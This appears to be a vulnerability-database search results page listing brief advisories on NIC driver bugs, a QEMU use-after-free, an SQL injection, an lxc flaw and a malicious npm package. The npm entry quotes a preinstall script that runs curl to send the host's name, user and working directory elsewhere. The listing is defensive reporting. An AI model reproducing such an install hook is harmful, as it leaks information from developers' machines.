701 matches found
kernel: bnxt_en: Fix RSS context delete logic
A flaw was found in the bnxten driver of the Linux kernel. An issue in the RSS Receive Side Scaling context deletion logic can lead to a leak of VNICs Virtual Network Interface Controllers in the firmware. This can cause subsequent attempts to create new VNICs to fail, resulting in the loss of...
Astra Linux – Vulnerability in Linux 5.10
In the Linux kernel, the following vulnerability has been resolved: eth: bnxt: fixed an issue where access to the vnicinfo array was out of range. The bnxtqueuestart | stop access allocates vnicinfo, which indicates bp-nrvnics. Therefore, it should not access bp-vnicinfobp-nrvnics...
Siemens RuggedCom Rox Use After Free (CVE-2023-3019)
A DMA reentrancy issue leading to a use-after-free error was found in the e1000e NIC emulation code in QEMU. This issue could allow a privileged guest user to crash the QEMU process on the host, resulting in a denial of service. This plugin only works with Tenable.ot. Please visit...
Malicious code in nic-datagov (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf package.json declares a preinstall script that runs curl --data-urlencode "info=$hostname && whoami && pwd"...
MAL-2026-5836 Malicious code in nic-datagov (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf package.json declares a preinstall script that runs curl --data-urlencode "info=$hostname && whoami && pwd"...
CVE-2026-11475
A weakness has been identified in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected by this vulnerability is the function getStatus of the file controllers/GradeController.php of the component Certificate Verification Endpoint. Executing a manipulation of...
CVE-2026-46287
In the Linux kernel, the following vulnerability has been resolved: net: txgbe: fix RTNL assertion warning when remove module For the copper NIC with external PHY, the driver called phylinkconnectphy during probe and phylinkdisconnectphy during remove. It caused an RTNL assertion warning in...
UBUNTU-CVE-2026-46287
In the Linux kernel, the following vulnerability has been resolved: net: txgbe: fix RTNL assertion warning when remove module For the copper NIC with external PHY, the driver called phylinkconnectphy during probe and phylinkdisconnectphy during remove. It caused an RTNL assertion warning in...
CVE-2026-46287
In the Linux kernel, the following vulnerability has been resolved: net: txgbe: fix RTNL assertion warning when remove module For the copper NIC with external PHY, the driver called phylinkconnectphy during probe and phylinkdisconnectphy during remove. It caused an RTNL assertion warning in...
CVE-2026-46287 net: txgbe: fix RTNL assertion warning when remove module
In the Linux kernel, the following vulnerability has been resolved: net: txgbe: fix RTNL assertion warning when remove module For the copper NIC with external PHY, the driver called phylinkconnectphy during probe and phylinkdisconnectphy during remove. It caused an RTNL assertion warning in...
CVE-2026-46287
In the Linux kernel, the net/txgbe driver for copper NICs with external PHY fixed an RTNL assertion warning that occurred during module removal. The root cause was phylink_disconnect_phy() being called during remove without proper RTNL protection, triggering an assertion in phylink_disconnect_phy...
CVE-2026-11475 Kushan2k student-management-system Certificate Verification Endpoint GradeController.php getStatus sql injection
A weakness has been identified in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected by this vulnerability is the function getStatus of the file controllers/GradeController.php of the component Certificate Verification Endpoint. Executing a manipulation of...
CVE-2026-11475 Kushan2k student-management-system Certificate Verification Endpoint GradeController.php getStatus sql injection
A weakness has been identified in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected by this vulnerability is the function getStatus of the file controllers/GradeController.php of the component Certificate Verification Endpoint. Executing a manipulation of...
CVE-2026-11475
The CVE-2026-11475 affects Kushan2k student-management-system. Affects the function getStatus in controllers/GradeController.php of the Certificate Verification Endpoint. The underlying issue is that manipulating the nic argument can cause an SQL injection, enabling remote exploitation. Public ex...
CVE-2026-11475
A weakness has been identified in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected by this vulnerability is the function getStatus of the file controllers/GradeController.php of the component Certificate Verification Endpoint. Executing a manipulation of...
Student-Management-System 注入漏洞
Student-Management-System is an open-source student information management system developed by Cyber-III. There is a vulnerability in Student-Management-System, which stems from improper handling of the parameter “nic” in the getStatus function of the controllers/GradeController.php file at the...
PT-2026-47237
A weakness has been identified in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected by this vulnerability is the function getStatus of the file controllers/GradeController.php of the component Certificate Verification Endpoint. Executing a manipulation of...
PT-2026-47359
Name of the Vulnerable Software and Affected Versions Linux kernel versions prior to 7.0.12-1.1 Description An RTNL assertion warning occurs in the txgbe driver for copper NICs with an external PHY during module removal. This happens because the phylink disconnect phy function is called without t...
Updated lxc packages fix security vulnerability
CVE-2026-39402, lxc lxc-user-nic insufficient ownership validation allows cross-tenant OVS port deletion...
MGASA-2026-0172 Updated lxc packages fix security vulnerability
CVE-2026-39402, lxc lxc-user-nic insufficient ownership validation allows cross-tenant OVS port deletion...